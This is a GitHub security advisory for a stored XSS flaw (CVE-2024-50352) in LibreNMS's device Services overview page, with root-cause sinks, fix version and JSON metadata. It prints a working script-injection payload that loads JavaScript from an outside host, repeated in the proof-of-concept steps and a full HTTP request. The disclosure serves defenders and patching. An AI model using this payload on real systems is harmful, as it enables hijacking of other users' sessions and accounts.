ghsa-qr8f-5qqg-j3wg
Vulnerability from github
Summary
A Stored Cross-Site Scripting (XSS) vulnerability in the "Services" section of the Device Overview page allows authenticated users to inject arbitrary JavaScript through the "name" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users' sessions, potentially compromising their accounts and enabling unauthorized actions.
Details
When creating a device through the "edit device -> services" workflow (example path: "/device/15/edit/section=services"), the attacker can inject an XSS payload in the "name" parameter. This payload is then reflected in the "Services" section of the "Overview" page of the device. It is important to note that the vulnerability does not exist when creating devices through the normal "Add Service" interface (created through the ajax_form.php request with the "type=create-service").
The payload used to exploit this vulnerability is:
Name'"><script/src=//15.rs></script>
Note: The payload uses the "15.rs" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.
The root cause is the application's failure to sanitize the "name" parameter before outputting it in the HTML. The sinks are as follows: https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/overview/services.inc.php#L36 https://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/overview.inc.php#L74
PoC
- Create a service for a device using the following payload in the "name" parameter:
Name'"><script/src=//15.rs></script>
- Save the service.
- Navigate to the "Overview" page of the device.
- Observe that the injected script executes in the "Services" section of the page.
Example Request:
```http POST /device/15/edit/section=services HTTP/1.1 Host: Content-Type: application/x-www-form-urlencoded Cookie:
_token=&name=Name'">&addsrv=yes&device=15&type=pollen&descr=Descr'">&ip=IP'">¶ms=Params'">&Submit= ```
Impact
This vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users' sessions when they visit the "Services" section of the device's overview page. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.
{ "affected": [ { "database_specific": { "last_known_affected_version_range": "\u003c= 24.9.1" }, "package": { "ecosystem": "Packagist", "name": "librenms/librenms" }, "ranges": [ { "events": [ { "introduced": "0" }, { "fixed": "24.10.0" } ], "type": "ECOSYSTEM" } ] } ], "aliases": [ "CVE-2024-50352" ], "database_specific": { "cwe_ids": [ "CWE-79" ], "github_reviewed": true, "github_reviewed_at": "2024-11-15T15:39:52Z", "nvd_published_at": "2024-11-15T16:15:35Z", "severity": "HIGH" }, "details": "### Summary\nA Stored Cross-Site Scripting (XSS) vulnerability in the \"Services\" section of the Device Overview page allows authenticated users to inject arbitrary JavaScript through the \"name\" parameter when adding a service to a device. This vulnerability could result in the execution of malicious code in the context of other users\u0027 sessions, potentially compromising their accounts and enabling unauthorized actions.\n\n### Details\nWhen creating a device through the \"edit device -\u003e services\" workflow (example path: \"/device/15/edit/section=services\"), the attacker can inject an XSS payload in the \"name\" parameter. This payload is then reflected in the \"Services\" section of the \"Overview\" page of the device. It is important to note that the vulnerability does not exist when creating devices through the normal \"Add Service\" interface (created through the ajax_form.php request with the \"type=create-service\").\n\nThe payload used to exploit this vulnerability is:\n```Name\u0027\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n\nNote: The payload uses the \"15.rs\" domain to bypass some of the length restrictions found during research by pointing to a malicious remote file. The file contains a POC XSS payload, and can contain any arbitrary JS code.\n\nThe root cause is the application\u0027s failure to sanitize the \"name\" parameter before outputting it in the HTML. The sinks are as follows:\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/overview/services.inc.php#L36\nhttps://github.com/librenms/librenms/blob/7f2ae971c4a565b0d7345fa78b4211409f96800a/includes/html/pages/device/overview.inc.php#L74\n\n### PoC\n1. Create a service for a device using the following payload in the \"name\" parameter:\n```Name\u0027\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e```\n2. Save the service.\n3. Navigate to the \"Overview\" page of the device.\n4. Observe that the injected script executes in the \"Services\" section of the page.\n\nExample Request:\n\n```http\nPOST /device/15/edit/section=services HTTP/1.1\nHost: \u003cyour_host\u003e\nContent-Type: application/x-www-form-urlencoded\nCookie: \u003cyour_cookie\u003e\n\n_token=\u003cyour_token\u003e\u0026name=Name\u0027\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026addsrv=yes\u0026device=15\u0026type=pollen\u0026descr=Descr\u0027\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026ip=IP\u0027\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026params=Params\u0027\"\u003e\u003cscript/src=//15.rs\u003e\u003c/script\u003e\u0026Submit=\n```\n\n### Impact\n\nThis vulnerability allows authenticated users to inject and execute arbitrary JavaScript in the context of other users\u0027 sessions when they visit the \"Services\" section of the device\u0027s overview page. This could result in the compromise of user accounts and unauthorized actions performed on their behalf.", "id": "GHSA-qr8f-5qqg-j3wg", "modified": "2024-11-15T20:49:54Z", "published": "2024-11-15T15:39:52Z", "references": [ { "type": "WEB", "url": "https://github.com/librenms/librenms/security/advisories/GHSA-qr8f-5qqg-j3wg" }, { "type": "ADVISORY", "url": "https://nvd.nist.gov/vuln/detail/CVE-2024-50352" }, { "type": "WEB", "url": "https://github.com/librenms/librenms/commit/b4af778ca42c5839801f16ece53505bb7fa1e7bc" }, { "type": "PACKAGE", "url": "https://github.com/librenms/librenms" } ], "schema_version": "1.4.0", "severity": [ { "score": "CVSS:3.1/AV:N/AC:L/PR:H/UI:R/S:C/C:H/I:L/A:L", "type": "CVSS_V3" } ], "summary": "LibreNMS has a Stored XSS (\u0027Cross-site Scripting\u0027) in librenms/includes/html/pages/device/overview/services.inc.php" }
Sightings
Author | Source | Type | Date |
---|
Nomenclature
- Seen: The vulnerability was mentioned, discussed, or seen somewhere by the user.
- Confirmed: The vulnerability is confirmed from an analyst perspective.
- Exploited: This vulnerability was exploited and seen by the user reporting the sighting.
- Patched: This vulnerability was successfully patched by the user reporting the sighting.
- Not exploited: This vulnerability was not exploited or seen by the user reporting the sighting.
- Not confirmed: The user expresses doubt about the veracity of the vulnerability.
- Not patched: This vulnerability was not successfully patched by the user reporting the sighting.